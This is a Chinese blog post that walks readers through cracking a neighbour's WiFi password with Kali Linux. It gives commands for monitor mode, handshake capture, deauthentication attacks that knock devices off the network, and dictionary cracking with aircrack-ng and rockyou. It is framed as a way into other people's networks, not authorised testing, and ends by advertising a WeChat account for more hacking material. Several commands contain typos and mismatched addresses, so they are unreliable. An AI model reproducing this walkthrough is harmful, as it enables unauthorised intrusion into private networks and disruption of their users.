小子,就是你把我家的网弄慢了对吧!

很多小伙伴多多少少了解过一些黑客技术

比如,最常见的破解隔壁邻居wifi密码

当时可能是觉得酷炫有趣,产生了好奇,各种百度搜索,但是无奈找不到操作流程最后不了了之

那么这个属于哪个领域的技术?

其实是渗透

渗透领域里面有很多厉害的工具

渗透测试人员为了方便做渗透测试,就把很多渗透工具集成在了一个系统里面

这个系统就是kali linux

kali是黑客最常用的系统,其包含众多黑客工具,方便使用

破解wifi需要用到什么?

破解WiFi是kali比较简单的一个操作,破解WiFi最重要的是要有一个好的字典,我以Kali Linux自带的rockyou字典为例,位于/user/share/wordlists/rockyou.txt.gz

使用前先解压:

# gzip -d /usr/share/wordlists/rockyou.txt.gz

废话不多说,教程开始

1.查看网卡是否支持监听模式

在终端输入:airmon-ng


上面列出了支持监听模式的无线网卡,可以看到wlan0支持监听模式

2.开启监听模式

在终端输入:airmon-ng start wlan0


执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看

3.查看WiFi网络

在终端输入:airodump-ng wlan0mon

此时,会列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。

记住要破解wifi的频道号和BSSID,按Ctrl-C结束

4.抓取握手包。

开始抓包:airodump-ng -c6 --bssidBC:46:99:66:F9:84 -w ~/ wlan0mon

参数解释:

-c指定频道号

–bssid指定路由器bssid

-w指定抓取的数据包保存位置

注意此处的空格


5.强制连接到wifi的设备重新连接路由器

经过步骤4,我们需要等用户连接/重连接wifi,才能抓到包,此时,就可能需要很长时间,因为并比一定一定有新用户连接此WiFi,所以,我们需要迫使用户连接WiFi

kali中有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi

但是,aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备。从上图(3)可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。

打开新终端执行:aireplay-ng -02 -a 46:99:66:F9:84 -c B8:E8:56:09:CC:9C wlan0mon

参数解释:

-0表示发起deauthentication攻击

-a指定无线路由器BSSID

-c指定强制断开的设备

注意此处代码空格


如果成功,会如下图


按Ctrl-C结束抓包。

我们已经得到了想要的握手包了,可以结束无线网卡的监控模式了:


6.开始破解密码。

在终端输入:aircrack-ng- a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt~/*.cap

参数解释:

-a2代表WPA的握手包

-b指定要破解的wifi BSSID。

-w指定字典文件

-最后是抓取的包

然后就是等待了,可能几分钟,也可能几个小时,这就根据电脑性能和密码的复杂程度了。如果不成功,可以再用其他字典,继续破解



上面这个方法其实就是跑字典,如果你想要用更加精准快速的方法,那就是社工了


kali里面有很多的工具,如果你对kali感兴趣,可以深入研究学习


我这里有很多这方面的干货资料



感兴趣的可以拿去研究学习一下,需要资料的小伙伴,可以关注我的公众号:【小狼工具】,然后后台回复关键词:“kali” 获取

你可能感兴趣的:(小子,就是你把我家的网弄慢了对吧!)